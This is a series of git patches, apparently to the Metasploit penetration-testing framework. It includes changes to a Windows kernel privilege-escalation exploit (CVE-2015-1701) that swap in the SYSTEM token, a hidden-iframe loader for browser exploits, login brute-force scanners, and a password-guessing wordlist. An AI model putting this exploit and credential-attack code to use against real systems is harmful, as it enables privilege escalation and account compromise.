zrGBGcPz|2`o`Iebo+~`r9-GJSnc^w%Ec4vy2{T~-;Ca#$VZeUm{lfc`x1Ue-J;9#X
z;cNDN;p_JG@n`tQ_+9=Sf1ba>|AhZlf2;pvzb6nb3EUrO3fP0s1h3GRYPWC}bB>nq
ze8}<oi*iBfWu0qXY}IVjZ1Zim+3a?|J=ZbQ5pdq;tYeD?x~96$yEeIBaT`^$>Q=8~
z1J<bP)c3jWkMp=ZQO{eR6P^dX2fQZVFrSx0Rpook7xj7lclqz}H~2flemO8WFf3pR
zv;<0mMcQI6DJ!(wIC*}{MP;qFPJ2+>pw(-ew5PO2Z95m1m$XBgRKZU$tYA<nwuY=`
z`&0HEcE4kiBhRtWanfOMdYnzp_go*l)~LxIi)V-DCC?k4cRlmHrQRK0m+uiSdAzxf
z2VwE0Gu>vfW!kcA**3-Iu&LZSa%_`qxwf(HHSUA%uqVfx%hirIH1G%xFR@R?T0Pbi
zwqEvhZX;vuirryX?ThU9*|*uZ+nemW?0f8c?NR#yd$WC@Bh``auy9Gb-|?`c$+6q9
z*AaCbaGY=?IVU)CbDYzidCq)ip|i+Y>|Em9;oQY;-Rq1xUGC34_xUFW76fh%JQ#R0
za9L1l;_DJCuuy%(yV<*w^TFgB_~?&=<e`b#+*=$T)l=$O<*9mfc(Od^5~=m#g?5R5
zrN7kwXnwN%nX#SkYmWv7%b)eGuvgpbc8^Yx_sfOidhBPpZT@5a^1$&xM<9#4MlKh!
zQtlEPgL{H)!LDGcrfP+p+T|RLU0mMVv@WqzxUz{aNk+w@<S4~Th0>rzmG<~4vpY9c
L-XrS`viZLN*X0=>

diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
index 637ddf7cd2..ef97381f17 100755
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -70,7 +70,13 @@ pUser32_ClientCopyImage		g_originalCCI = NULL;
 PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
 int							g_shellCalled = 0;
 DWORD						g_OurPID;
-DWORD						g_EPROCESS_TokenOffset = 0;
+
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
+
+lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
 
 typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );
 
@@ -272,6 +278,9 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 			break;
 		}
 
+		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
+		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
+
 		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
 		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
 
@@ -329,6 +338,36 @@ HWND GetFirstThreadHWND(
 	return 0;
 }
 
+// Search the specified data structure for a member with CurrentValue.
+BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+{
+	DWORD_PTR dwIndex, dwMask;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting.
+#ifdef _M_X64
+	dwMask = ~0xf;
+#else
+	dwMask = ~7;
+#endif
+	// dwMask out the reference count.
+	dwCurrentValue &= dwMask;
+
+	// Scan the structure for any occurrence of dwCurrentValue.
+	for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
+	{
+		if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
+		{
+			// And finally, replace it with NewValue.
+			pdwStructure[dwIndex] = dwNewValue;
+			return TRUE;
+		}
+	}
+
+	// Member not found.
+	return FALSE;
+}
+
 /*
 * StealProcessToken
 *
@@ -349,9 +388,14 @@ NTSTATUS NTAPI StealProcessToken(
 	if (NT_SUCCESS(Status)) {
 		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
 		if (NT_SUCCESS(Status)) {
-			if (g_EPROCESS_TokenOffset) {
-				*(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset);
-			}
+			PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
+			PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
+
+			// Find the token in the target process, and replace with the system token.
+			find_and_replace_member((PDWORD_PTR)CurrentProcess,
+				(DWORD_PTR)targetToken,
+				(DWORD_PTR)systemToken,
+				0x200);
 		}
 	}
 	return Status;
@@ -436,13 +480,6 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	g_OurPID = GetCurrentProcessId();
 	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
 
-#ifdef _WIN64
-	g_EPROCESS_TokenOffset = 0x208;
-#else
-	g_EPROCESS_TokenOffset = 0xF8;
-#endif
-
-
 	if (g_PsLookupProcessByProcessIdPtr == NULL) {
 		ExitProcess((UINT)-3);
 		return;

From 910ae8a480bf6e2fe0eed95f180d9846bee38689 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 4 Jun 2015 23:09:55 -0500
Subject: [PATCH 0321/1013] Fix #5461, actually stop a job from the RPC service

Fix #5461. The RPC service is incorrectly using the wrong method to
stop a job, this patch should fix that.
---
 lib/msf/core/rpc/v10/rpc_job.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/rpc/v10/rpc_job.rb b/lib/msf/core/rpc/v10/rpc_job.rb
index 43b132f877..8624cb9af4 100644
--- a/lib/msf/core/rpc/v10/rpc_job.rb
+++ b/lib/msf/core/rpc/v10/rpc_job.rb
@@ -28,9 +28,10 @@ class RPC_Job < RPC_Base
   # @example Here's how you would use this from the client:
   #  rpc.call('job.stop', 0)
   def rpc_stop(jid)
-    obj = self.framework.jobs[jid.to_s]
+    jid = jid.to_s
+    obj = self.framework.jobs[jid]
     error(500, "Invalid Job") if not obj
-    obj.stop
+    self.framework.jobs.stop_job(jid)
     { "result" => "success" }
   end
 

From 5f4b2ed22a8d4583a37b1548e42c4649af8549c0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 4 Jun 2015 23:36:36 -0500
Subject: [PATCH 0322/1013] Newline

---
 .../exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb   | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 6ea9de8851..2b401c731b 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -143,4 +143,4 @@ class Metasploit3 < Msf::Exploit::Remote
     swf
   end
 
-end
\ No newline at end of file
+end

From 71a848709159b0996add88a935762858a3341869 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 4 Jun 2015 23:46:41 -0500
Subject: [PATCH 0323/1013] Correct Flash version in the module description

There is no 11.2.202.404, mang.
---
 .../multi/browser/adobe_flash_net_connection_confusion.rb       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 1182b2f2b7..8e0dc8a526 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
         successfully on:
         * Windows 7 SP1 (32-bit) with IE 8, IE11 and Adobe Flash 16.0.0.305
         * Linux Mint "Rebecca" (32 bits), and Ubuntu 14.04.2 LTS with Firefox 33.0 and
-          Adobe Flash 11.2.202.404.
+          Adobe Flash 11.2.202.442.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>

From b6936febbe51225371c3587754105db689e11f9c Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Fri, 5 Jun 2015 12:16:00 +0500
Subject: [PATCH 0324/1013] Update pcanywhere_login to use the new cred API

---
 .../scanner/pcanywhere/pcanywhere_login.rb    | 39 +++++++++++++++----
 1 file changed, 31 insertions(+), 8 deletions(-)

diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
index ff494943aa..c750621790 100644
--- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
+++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
@@ -44,14 +44,12 @@ class Metasploit3 < Msf::Auxiliary
       case result
       when :success
         print_good "#{ip}:#{rport} Login Successful #{user}:#{pass}"
-        report_auth_info(
-          :host        => rhost,
-          :port        => datastore['RPORT'],
-          :sname       => 'pcanywhere_data',
-          :user        => user,
-          :pass        => pass,
-          :source_type => "user_supplied",
-          :active      => true
+        report_cred(
+          ip: rhost,
+          port: datastore['RPORT'],
+          service_name: 'pcanywhere',
+          user: user,
+          password: pass,
         )
         return if datastore['STOP_ON_SUCCESS']
         print_status "Waiting to Re-Negotiate Connection (this may take a minute)..."
@@ -73,6 +71,31 @@ class Metasploit3 < Msf::Auxiliary
 
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user, pass, nsock=self.sock)
     # Check if we are already at a logon prompt
     res = nsock.get_once(-1,5)

From 3ec6d9b7aad822f6a8e30e990c5375dd450ea4e9 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Fri, 5 Jun 2015 15:41:07 +0500
Subject: [PATCH 0325/1013] Update owa_login to use new cred API

---
 modules/auxiliary/scanner/http/owa_login.rb | 86 ++++++++++++++++-----
 1 file changed, 65 insertions(+), 21 deletions(-)

diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb
index 9acadc34a2..299f1266bb 100644
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -76,7 +76,6 @@ class Metasploit3 < Msf::Auxiliary
       }
     )
 
-
     register_options(
       [
         OptInt.new('RPORT', [ true, "The target port", 443]),
@@ -128,7 +127,15 @@ class Metasploit3 < Msf::Auxiliary
       each_user_pass do |user, pass|
         next if (user.blank? or pass.blank?)
         vprint_status("#{msg} Trying #{user} : #{pass}")
-        try_user_pass({"user" => user, "domain"=>domain, "pass"=>pass, "auth_path"=>auth_path, "inbox_path"=>inbox_path, "login_check"=>login_check, "vhost"=>vhost})
+        try_user_pass({
+          user: user,
+          domain: domain,
+          pass: pass,
+          auth_path: auth_path,
+          inbox_path: inbox_path,
+          login_check: login_check,
+          vhost: vhost
+        })
       end
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
       print_error("#{msg} HTTP Connection Error, Aborting")
@@ -136,13 +143,13 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def try_user_pass(opts)
-    user = opts["user"]
-    pass = opts["pass"]
-    auth_path = opts["auth_path"]
-    inbox_path = opts["inbox_path"]
-    login_check = opts["login_check"]
-    vhost = opts["vhost"]
-    domain = opts["domain"]
+    user = opts[:user]
+    pass = opts[:pass]
+    auth_path = opts[:auth_path]
+    inbox_path = opts[:inbox_path]
+    login_check = opts[:login_check]
+    vhost = opts[:vhost]
+    domain = opts[:domain]
 
     user = domain + '\\' + user if domain
 
@@ -208,7 +215,13 @@ class Metasploit3 < Msf::Auxiliary
           :active => true,
           :type => 'password'}
 
-        report_auth_info(report_hash)
+        report_cred(
+          ip: datastore['RHOST'],
+          port: datastore['RPORT'],
+          service_name: 'owa',
+          user: user,
+          password: pass
+        )
         return :next_user
       end
 
@@ -273,7 +286,13 @@ class Metasploit3 < Msf::Auxiliary
         :active => true,
         :type => 'password'}
 
-      report_auth_info(report_hash)
+      report_cred(
+        ip: datastore['RHOST'],
+        port: datastore['RPORT'],
+        service_name: 'owa',
+        user: user,
+        password: pass
+      )
       return :next_user
     else
       vprint_error("#{msg} FAILED LOGIN. #{elapsed_time} '#{user}' : '#{pass}' (response body did not match)")
@@ -282,14 +301,14 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def get_ad_domain
-    urls = ["aspnet_client",
-      "Autodiscover",
-      "ecp",
-      "EWS",
-      "Microsoft-Server-ActiveSync",
-      "OAB",
-      "PowerShell",
-      "Rpc"]
+    urls = ['aspnet_client',
+      'Autodiscover',
+      'ecp',
+      'EWS',
+      'Microsoft-Server-ActiveSync',
+      'OAB',
+      'PowerShell',
+      'Rpc']
 
     domain = nil
 
@@ -299,7 +318,7 @@ class Metasploit3 < Msf::Auxiliary
           'encode'   => true,
           'uri'      => "/#{url}",
           'method'   => 'GET',
-          'headers'  =>  {"Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="}
+          'headers'  =>  {'Authorization' => 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=='}
         })
       rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
         vprint_error("#{msg} HTTP Connection Failed")
@@ -314,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
       if res && res.code == 401 && res.headers.has_key?('WWW-Authenticate') && res.headers['WWW-Authenticate'].match(/^NTLM/i)
         hash = res['WWW-Authenticate'].split('NTLM ')[1]
         domain = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(hash))[:target_name].value().gsub(/\0/,'')
-        print_good("Found target domain: " + domain)
+        print_good("Found target domain: #{domain}")
         return domain
       end
     end
@@ -322,6 +341,31 @@ class Metasploit3 < Msf::Auxiliary
     return domain
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def msg
     "#{vhost}:#{rport} OWA -"
   end

From 318f67fcda70f1ceab5d5a8a61dcd60fdc0e69ee Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 5 Jun 2015 09:01:20 -0500
Subject: [PATCH 0326/1013] update descriptions

---
 .../multi/browser/adobe_flash_net_connection_confusion.rb | 8 +++++---
 .../multi/browser/adobe_flash_uncompress_zlib_uaf.rb      | 4 +++-
 .../browser/adobe_flash_copy_pixels_to_byte_array.rb      | 6 ++++--
 3 files changed, 12 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 8e0dc8a526..97dfd64876 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -19,9 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote
         to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
         vectors, and finally accomplish remote code execution. This module has been tested
         successfully on:
-        * Windows 7 SP1 (32-bit) with IE 8, IE11 and Adobe Flash 16.0.0.305
-        * Linux Mint "Rebecca" (32 bits), and Ubuntu 14.04.2 LTS with Firefox 33.0 and
-          Adobe Flash 11.2.202.442.
+        * Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.
+        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
+        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.424.
+        * Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index fccecf14f9..b040cd0391 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -19,7 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
         to uncompress() a malformed byte stream. This module has been tested successfully
         on:
         * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.
-        * Linux Mint "Rebecca" (32 bits) with Firefox 33.0 and Flash 11.2.202.404.
+        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
+        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Flash 11.2.202.424.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>
diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
index 77e8ce5cbe..34dcd36cb9 100644
--- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
+++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
@@ -17,8 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
         in the copyPixelsToByteArray method from the BitmapData object. The position field of the
         destination ByteArray can be used to cause an integer overflow and write contents out of
-        the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
-        IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125.
+        the ByteArray buffer. This module has been tested successfully on:
+        * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125.
+        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179.
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>

From be60f964c6524c6670906c88ffdac3670e7e38ae Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 10:50:52 -0500
Subject: [PATCH 0327/1013] Call super for cleanup

---
 lib/msf/core/exploit/browserautopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 280e2359f3..d37a8991de 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -141,7 +141,7 @@ module Msf
       rm_target_info_notes
       rm_exploit_jobs
       rm_payload_jobs
-      stop_service if service
+      super
     end
 
 

From ecdeeea5c6ae20df2ca4b2684eea7a35c140b337 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 11:11:40 -0500
Subject: [PATCH 0328/1013] Make sure super is called

---
 lib/msf/core/exploit/browserautopwnv2.rb              | 7 ++++++-
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 1 +
 2 files changed, 7 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index d37a8991de..97e6111234 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -132,16 +132,21 @@ module Msf
     end
 
 
+    def stop_bap_job
+      $stderr.puts self.inspect
+    end
+
+
     # Cleans up everything such as notes and jobs.
     #
     # @see #rm_exploit_jobs The method for cleaning up jobs.
     # @see #rm_target_info_notes The method for removing target information (found in db notes).
     # @return [void]
     def cleanup
+      super
       rm_target_info_notes
       rm_exploit_jobs
       rm_payload_jobs
-      super
     end
 
 
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 074202b8e0..f07ec28166 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -128,6 +128,7 @@ module Msf
 
     # Cleans up target information owned by the current module.
     def cleanup
+      super
       # Whoever registered NoteTypePrefix should do the cleanup for notes
       return if self.datastore['NoteTypePrefix']
 

From f8c5e5a70ace011e94c96645dd9bf84406adfdf0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 11:16:43 -0500
Subject: [PATCH 0329/1013] Don't show "Server stopped"

---
 lib/msf/core/exploit/tcp_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb
index 14af809cc9..3a84cf38c9 100644
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -71,7 +71,7 @@ module Exploit::Remote::TcpServer
     super
     if(service)
       stop_service()
-      print_status("Server stopped.")
+      print_status("Server stopped.") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
     end
   end
 

From 15916f0ab0ad0b9c00693183e43fdb54ab324ce3 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 5 Jun 2015 11:45:53 -0500
Subject: [PATCH 0330/1013] Backport an upstream fix for a nil header

https://github.com/tmtm/ruby-mysql/commit/353d5951da1089432eac063b793b6561361be78a
https://github.com/tmtm/ruby-mysql/commit/7c984ea66e9cca61b1e6e99647138c99f44a5ba5
---
 lib/rbmysql/protocol.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/rbmysql/protocol.rb b/lib/rbmysql/protocol.rb
index c06e5bf01c..e3d9b18833 100644
--- a/lib/rbmysql/protocol.rb
+++ b/lib/rbmysql/protocol.rb
@@ -234,6 +234,7 @@ class RbMysql
       begin
         Timeout.timeout @read_timeout do
           header = @sock.read(4)
+          raise EOFError unless header && header.length == 4
           len1, len2, seq = header.unpack("CvC")
           len = (len2 << 8) + len1
           # Ignore the sequence number -- protocol differences between 4.x and 5.x

From e1c30e973dc706b005ad507809d742b25bf67658 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 12:14:43 -0500
Subject: [PATCH 0331/1013] Fix SRVHOST

---
 lib/msf/core/exploit/browserautopwnv2.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 97e6111234..5e91af35a2 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -476,6 +476,7 @@ module Msf
       t1 = Time.now
       self.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2
       self.datastore['DisablePayloadHandler'] = true
+
       super
       @bap_exploits    = []
       @exploit_job_ids = []
@@ -546,8 +547,12 @@ module Msf
     def start_service
       super
       show_ready_exploits
+      proto = (datastore['SSL'] ? "https" : "http")
+      srvhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      srvport = datastore['SRVPORT']
+      service_uri = "#{proto}://#{srvhost}:#{srvport}#{get_resource}"
       print_status("Please use the following URL for the browser attack:")
-      print_status("BrowserAutoPwn URL: #{self.get_uri}")
+      print_status("BrowserAutoPwn URL: #{service_uri}")
     end
 
 

From 188b15b17fa6f0f81e8879494f99e258be7c4cee Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 16:18:56 -0500
Subject: [PATCH 0332/1013] Fix the symbol vs string prob

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index f07ec28166..1340a1e9e7 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -514,8 +514,10 @@ module Msf
           try_set_target(profile)
           bad_reqs = get_bad_requirements(profile)
           if bad_reqs.empty?
+            browser_info = profile.values.first
+            browser_info = browser_info.inject({}){|data,(k,v)| data[k.to_sym] = v; data}
             begin
-              method(:on_request_exploit).call(cli, request, profile.values.first)
+              method(:on_request_exploit).call(cli, request, browser_info)
             rescue BESException => e
               elog("BESException: #{e.message}\n#{e.backtrace * "\n"}")
               send_not_found(cli)
@@ -574,8 +576,8 @@ module Msf
     # @param browser_info [Hash] The target profile
     # @return [String] The payload
     def get_payload(cli, browser_info)
-      arch     = browser_info['arch']
-      platform = browser_info['os_name']
+      arch     = browser_info[:arch]
+      platform = browser_info[:os_name]
 
       # Fix names for consistency so our API can find the right one
       # Originally defined in lib/msf/core/constants.rb

From f29b38b6026a463ab3af254ab8d650ecb280c511 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 5 Jun 2015 16:46:08 -0500
Subject: [PATCH 0333/1013] Add the top 20 keyboard patterns as passwords

See https://wpengine.com/unmasked/ for lots more, but this
covers the gif at

https://wpengine.com/unmasked/assets/images/commonkeyboardpatterns.gif
---
 data/wordlists/keyboard-patterns.txt | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 data/wordlists/keyboard-patterns.txt

diff --git a/data/wordlists/keyboard-patterns.txt b/data/wordlists/keyboard-patterns.txt
new file mode 100644
index 0000000000..143b9d904a
--- /dev/null
+++ b/data/wordlists/keyboard-patterns.txt
@@ -0,0 +1,20 @@
+qwerty
+qwertyuiop
+1qaz2wsx
+qazwsx
+asdfgh
+zxcvbnm
+1234qwer
+q1w2e3r4t5
+qwer1234
+q1w2e3r4
+asdfasdf
+qazwsxedc
+asdfghjkl
+q1w2e3
+1qazxsw2
+12QWaszx
+qweasdzxc
+mnbvcxz
+a1b2c3d4
+adgjmptw

From fb8abe54fc6c87627cb703af86cdb749c2f96f26 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 17:52:40 -0500
Subject: [PATCH 0334/1013] This will continue loading the rest of the exploits

---
 lib/msf/core/exploit/browserautopwnv2.rb | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 5e91af35a2..9e7e1e4efc 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -769,7 +769,6 @@ module Msf
 
       # Some Flash exploits don't seem to work well with a hidden iframe.
       js = %Q|
-      var currentIndex = 0;
       var exploitList = [#{exploit_list.map! {|e| "'#{e}'"} * ", "}];
 
       function setElementStyle(e, opts) {
@@ -797,13 +796,16 @@ module Msf
         e.setAttribute("id", "myiframe");
         moveIframe(e);
         document.body.appendChild(e);
-        setTimeout("loadExploit(currentIndex)", 1000);
+        loadExploit();
       }
 
-      function loadExploit(i) {
+      function loadExploit() {
         var e = document.getElementById("myiframe");
-        e.setAttribute("src", exploitList[i]);
-        currentIndex += 1;
+        var firstUri = exploitList.splice(0, 1);
+        if (firstUri != '') {
+          e.setAttribute("src", firstUri);
+          setTimeout("loadExploit()", 1000);
+        }
       }
       |
 

From a7fa434e896dc8ab52e59ef216117ccaf87d472e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 21:03:24 -0500
Subject: [PATCH 0335/1013] If exploit list is empty, have the option to return
 content

---
 lib/msf/core/exploit/browserautopwnv2.rb | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 9e7e1e4efc..ec9f74947b 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
